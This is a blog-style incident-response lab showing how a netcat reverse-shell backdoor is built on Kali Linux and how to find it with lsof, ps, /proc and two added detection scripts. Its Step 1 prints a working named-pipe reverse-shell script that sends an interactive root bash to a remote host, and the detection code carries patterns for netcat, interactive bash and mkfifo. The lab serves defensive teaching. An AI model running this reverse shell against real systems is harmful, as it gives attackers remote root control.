Linux Backdoor Detection & Analysis Lab for Security Analysts & Incident Responders
Simple backdoor and Security Analysis on the backdoor in Kali Linux


Author: Venkata Naveen Kumar Prabhuleti

Program: Master’s in Cybersecurity Analytics & Operations @ Penn State

LinkedIn: linkedin.com/in/naveen-kumar-9b55a0154



Why This Lab?

This simple and hands-on Linux lab demonstrates how attackers can set up a reverse shell backdoor using netcat and how defenders can analyze it using core Linux commands. As a Blue Teamer or SOC Analyst, understanding such techniques helps in building better detection and incident response strategies - right from the terminal.


What You Will Learn

  • How a reverse shell using nc works
  • Detecting such shells using lsof, ps, /proc/<pid>
  • Key forensic insights for real-time incident response
  • No need for advanced tools - just native Linux CLI


Environment Setup

Distro: Kali Linux (Cloud Install)

Tools: nc, lsof, ps, strings, /proc filesystem

Access: Root or sudo privileges


Step-by-Step Lab Walkthrough

Step 1: Create the Backdoor Script

#!/bin/bash
backpipe=/root/backpipe
rm -f $backpipe
mkfifo $backpipe
cat $backpipe | /bin/bash -i 2>&1 | nc 10.10.255.81 2222 > $backpipe

Save this as backpipe, make it executable using chmod +x backpipe, and execute it with ./backpipe.
(Screenshot: backdoor script created and executed as root)

Step 2: Attacker Connects to the Backdoor

On the attacker side:

$ nc -lvp 2222

Because the script was started as root, the shell that arrives runs with root privileges. Commands like whoami, ls, cd, and cat /etc/shadow are all accessible.


(Screenshot: reverse shell active and remote commands being executed)

Step 3: Analyze with lsof

Use lsof -i -P to list every network socket on the host with numeric ports, and lsof -p <PID> to list everything a single process has open (files, pipes, and sockets).

$ lsof -i -P
$ lsof -p 1816  # Replace with actual PID of nc

You’ll notice the nc process holding a TCP connection and referencing /root/backpipe.


(Screenshot: lsof_analysis)

Step 4: Inspect Process Tree

$ ps aux | grep nc

This reveals the processes behind the active reverse shell together with their command-line arguments, including the remote IP and port passed to nc.


(Screenshot: ps_analysis)

Step 5: Deep Dive into /proc

$ cd /proc/1816
$ ls
$ strings ./exe | less

You can inspect memory maps, file descriptors, environment variables, and the binary in use. The strings output shows that /bin/bash and nc were invoked through the script. For the invocation itself, /proc/<pid>/cmdline (the arguments, NUL-separated) and the symlinks under /proc/<pid>/fd are the most direct evidence: for the nc process one descriptor points at /root/backpipe and another at the network socket.


(Screenshot: proc_inspection)
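The Step 3 to Step 5 triage, wrapped into reusable shell functions. This is an added example and not part of the lab's own files; it assumes a Linux host with a /proc filesystem, and the function names (flag_suspicious_procs, find_named_pipes, proc_summary, triage_host) are this example's own. Each function also accepts saved or constructed input, so the checks can be rehearsed offline against a copied process listing or a fake /proc directory before running them on a live box.

```shell
#!/bin/sh
# Added example (not from the original lab): Steps 3-5 as shell functions.
# Assumes Linux with /proc. Function names are this example's own.

# Flag process-listing lines (stdin, e.g. `ps -eo pid,user,args`) that carry the
# fingerprints of the lab's backdoor: a netcat binary, an interactive bash, or mkfifo.
flag_suspicious_procs() {
    grep -E '(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]|bash[[:space:]]+-i|(^|[[:space:]])mkfifo([[:space:]]|$)'
}

# List named pipes (FIFOs) under the given directories; the lab's script leaves one at /root/backpipe.
find_named_pipes() {
    find "$@" -xdev -type p 2>/dev/null
}

# Summarise one /proc/<pid> directory: full command line, exe, cwd, and where each
# file descriptor points. A FIFO among the descriptors next to a socket is the backpipe pattern.
proc_summary() {
    dir=$1
    [ -d "$dir" ] || { printf 'no such process directory: %s\n' "$dir" >&2; return 1; }
    # cmdline is NUL-separated; turn the separators into spaces for display
    printf 'cmdline: %s\n' "$(tr '\000' ' ' < "$dir/cmdline")"
    [ -L "$dir/exe" ] && printf 'exe:     %s\n' "$(readlink "$dir/exe")"
    [ -L "$dir/cwd" ] && printf 'cwd:     %s\n' "$(readlink "$dir/cwd")"
    for f in "$dir"/fd/*; do
        [ -L "$f" ] || continue
        printf 'fd %s -> %s\n' "${f##*/}" "$(readlink "$f")"
    done
    return 0
}

# Live run: tie the three checks together on the current host
# (root is needed to read other users' /proc entries).
triage_host() {
    echo '== suspicious processes =='
    ps -eo pid,user,args | flag_suspicious_procs
    echo '== named pipes in common drop locations =='
    find_named_pipes /tmp /var/tmp /dev/shm /root /home
    echo '== /proc detail for flagged PIDs =='
    ps -eo pid,args | flag_suspicious_procs | awk '{print $1}' | while read -r pid; do
        echo "--- pid $pid"
        proc_summary "/proc/$pid"
    done
}

# Run the live triage only when invoked as `sh triage.sh --run`,
# so the file can also be sourced for the individual functions.
if [ "${1:-}" = "--run" ]; then
    triage_host
fi
```

Run it as root with `sh triage.sh --run`. The grep pattern is deliberately broad (any nc invocation, any interactive bash, any mkfifo) because on a server these are rare enough that a handful of false positives is cheaper than a missed shell; tune it per host once you know what normally runs there.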



What This Lab Teaches

Realistic Threat Insight

This is a common stealthy persistence technique used in Linux-based infrastructures.

Defender Visibility

This lab gives hands-on exposure to:

  • Detecting unauthorized remote shells
  • Investigating abnormal TCP ports
  • Inspecting named pipes used in covert channels
  • Digging into live process artifacts via /proc

No Tools Needed

Forget heavy EDRs for simple analysis - this is raw and direct Linux forensics using just terminal commands.


Analyst Tips

Watch out for:

  • Usage of mkfifo in bash scripts
  • Long-running nc processes
  • Unusual ports like 2222 open to unknown IPs
  • Named pipes in /tmp/, /root/ being used
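The "watch out for" list above, turned into three checks a defender can schedule or run by hand. This is an added example, not part of the lab's files; it assumes a Linux host with iproute2 (`ss -tnp`) and procps (`ps -eo pid,etimes,args`) for the live path, and the function names and the allowlist of peer ports are this example's own choices. Each check also reads saved output on stdin, so captured `ss`/`ps` text from an incident can be reviewed on another machine.

```shell
#!/bin/sh
# Added example (not from the original lab): the analyst tips as checks.
# Assumes Linux with iproute2 and procps for the live run; function names are this example's own.

# Established TCP connections whose peer port is outside an allowlist, or which are
# held by a netcat binary. Input (stdin): plain `ss -tnp` output, header included.
# Override the allowlist with ALLOWED_PEER_PORTS="22 443 ..." in the environment.
flag_unusual_connections() {
    awk -v allow="${ALLOWED_PEER_PORTS:-22 53 80 443}" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "State" { next }                 # column header
    $1 != "ESTAB" { next }                 # only live connections matter here
    {
        n = split($5, p, ":"); port = p[n] # peer port is the last ":"-separated field
        viaNetcat = ($6 ~ /"(nc|ncat|netcat)"/)
        if (!(port in ok) || viaNetcat)
            printf "%s peer=%s port=%s process=%s\n", $4, $5, port, $6
    }'
}

# Netcat processes alive longer than a threshold in seconds (default 300).
# Input (stdin): `ps -eo pid,etimes,args` output, header included.
long_running_netcat() {
    awk -v thr="${1:-300}" '
    $2 !~ /^[0-9]+$/ { next }                              # header or malformed line
    $3 ~ /(^|\/)(nc|ncat|netcat)$/ && $2 + 0 >= thr { print }'
}

# Scripts under the given directories that pair mkfifo with a netcat call,
# the same combination the lab's backpipe script uses. Prints matching paths.
scan_scripts_for_fifo_shell() {
    find "$@" -xdev -type f -size -1024k 2>/dev/null | while IFS= read -r f; do
        if grep -qE '(^|[[:space:]])mkfifo[[:space:]]' "$f" 2>/dev/null \
           && grep -qE '(^|[[:space:];|])(nc|ncat|netcat)[[:space:]]' "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# Live run: `sh indicators.sh --run` (root needed for ss to name other users' processes).
check_host_indicators() {
    echo '== established connections to unexpected peer ports or via netcat =='
    ss -tnp | flag_unusual_connections
    echo '== netcat processes alive longer than 5 minutes =='
    ps -eo pid,etimes,args | long_running_netcat 300
    echo '== scripts pairing mkfifo with netcat =='
    scan_scripts_for_fifo_shell /root /home /tmp /var/tmp /etc/cron.d /etc/init.d
}

if [ "${1:-}" = "--run" ]; then
    check_host_indicators
fi
```

The connection check keys on the peer port rather than the local one because a reverse shell is an outbound connection: on the victim the local port is an ephemeral number, and 2222 only shows up on the peer side. Feed the output of all three checks into your log pipeline with a timestamp and hostname so the hits can be correlated with the rest of the host's activity.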

Combine this lab knowledge with log monitoring tools like Splunk, Syslog, or Wazuh for deeper threat correlation.


Get the Lab Files

GitHub-ready Lab:

You can download the full lab with Markdown, images, and documentation:

Download Linux_Backdoor_Analysis_Lab.zip


Let’s Connect

If you found this useful, please leave a reaction or comment and let’s discuss real-world reverse shell detection!

Connect with me: linkedin.com/in/naveen-kumar-9b55a0154

DM me if you want the raw lab files or need help setting up your sandbox.

